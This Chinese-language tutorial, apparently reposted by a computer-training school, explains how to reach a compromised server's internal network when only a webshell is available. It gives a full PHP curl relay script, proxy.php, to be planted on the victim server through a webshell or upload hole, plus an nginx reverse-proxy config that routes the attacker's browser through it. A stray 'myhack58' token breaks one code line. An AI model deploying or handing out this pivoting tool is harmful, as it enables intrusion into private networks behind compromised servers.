如何實現(xiàn)服務(wù)器上的端口代理
如何實現(xiàn)服務(wù)器上的端口代理?有時候要代理進內(nèi)網(wǎng),但是服務(wù)器沒有外網(wǎng)端口,也沒法執(zhí)行命令反彈lcx什么的,也沒有提權(quán)什么什么的,只有一個webshell,這個時候就比較糾結(jié)了。
在這分享一個比較山寨的php+nginx反向代理,可以比較容易的實現(xiàn)這個功能。
架設(shè)起來也算是比較方便了。就把這個用webshell也好,上傳漏洞也好,甩到對方服務(wù)器上。
然后配置一下本地的nginx,做一個反向代理+rewrite就OK。
先看代碼
proxy.php
<?php
if(!isset($_GET['url'])){
exit(0);
}
$ch = curl_init();
$url=$_GET['url'];
if(strstr($url,'?')){
$url.='&';
}
else{
$url.='?';
}
unset($_GET['url']);
foreach($_GET as $Key=>$Val){
if(get_magic_quotes_gpc()){
$Val=stripslashes($Val);
}
$url=$url.'&'.$Key.'='.urlencode($Val);
}
$cookie='';
foreach($_COOKIE as $Key=>$Val){
if(get_magic_quotes_gpc()){
$Val=stripslashes($Val);
}
$cookie=$cookie.$Key.'='.urlencode($Val).'; ';
}
if($_SERVER['REQUEST_METHOD']=="POST"){
curl_setopt($ch, CURLOPT_POST, 1);
$post_data=''; myhack58
foreach($_POST as $Key=>$Val){
if(get_magic_quotes_gpc()){
$Val=stripslashes($Val);
}
$post_data=$post_data.'&'.$Key.'='.urlencode($Val);
}
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
}
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_HEADER, TRUE);
curl_setopt($ch, CURLOPT_NOBODY, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
if(isset($_SERVER['HTTP_REFERER'])){
curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_REFERER']);
}
$Response=curl_exec($ch);
if(!$Response){
curl_close($ch);
exit(0);
}
$HttpStatus=curl_getinfo($ch,CURLINFO_HTTP_CODE);
$Header=substr($Response,0,curl_getinfo($ch, CURLINFO_HEADER_SIZE));
$Body=substr($Response,curl_getinfo($ch, CURLINFO_HEADER_SIZE));
$Headers=split("\r\n",$Header);
foreach($Headers as $ThusHead){
if($ThusHead == 'Transfer-Encoding: chunked' || strstr($ThusHead,'Content-Length')!==false){
continue;
}
header($ThusHead,FALSE);
}
echo $Body;
curl_close($ch);
?>
代碼很簡單,也有一些簡單的小bug,不知各位看官看出來沒有,我也懶得去修改了。
另外就是:
1. 這個代理只支持基本的GET/POST并不支持上傳文件,有興趣的可以自己看看,搞搞,搞完發(fā)出來,造福大家
2. 這個代理在轉(zhuǎn)發(fā)post請求的時候,用的并不是www-url-encode,所以,也許會有的程序識別不正常
然后在本地的nginx里面新加一個配
# proxy webshell
server {
listen 這里寫監(jiān)聽端口;
location ~ () {
proxy_pass http://webshell的IP/文件/存放/目錄/com/proxy.php?url=http://$host/$request_uri;
proxy_set_header Host "訪問webshell用域名";
}
}
然后重新加載一下nginx配置,配置瀏覽器使用nginx監(jiān)聽的端口做為代理,就可以使了。
本文由站河南北大青鳥校區(qū)整編而成,如需了解更多IT資訊類的文章、新聞、課程和學習技巧、就業(yè)案例、招生詳情等問題,可以對在線咨詢老師進行一對一問答!
推薦資訊
- 鄭州北大青鳥就業(yè)學員李兵就業(yè)感... 2014-08-03
- 鄭州市電腦培訓學校推薦加靠譜的... 2021-01-22
- 鄭州北大青鳥翔天信鴿校區(qū)2018年... 2018-01-30
- 鄭州北大青鳥給2016年迷茫的學生... 2016-01-25
- 高考落榜生選擇北大青鳥,沐浴新... 2017-06-11
熱點資訊
- 電腦溫度多少是正常的情況呢?... 2018-09-07
- 四個策略及簡單的防護方法... 2018-09-07
- 對硬盤進行雙分區(qū)有什么好處... 2018-09-07
- 文件加密的幾個簡單方法... 2018-09-07
- 計算機小技巧,80G硬盤巧變變成... 2018-09-07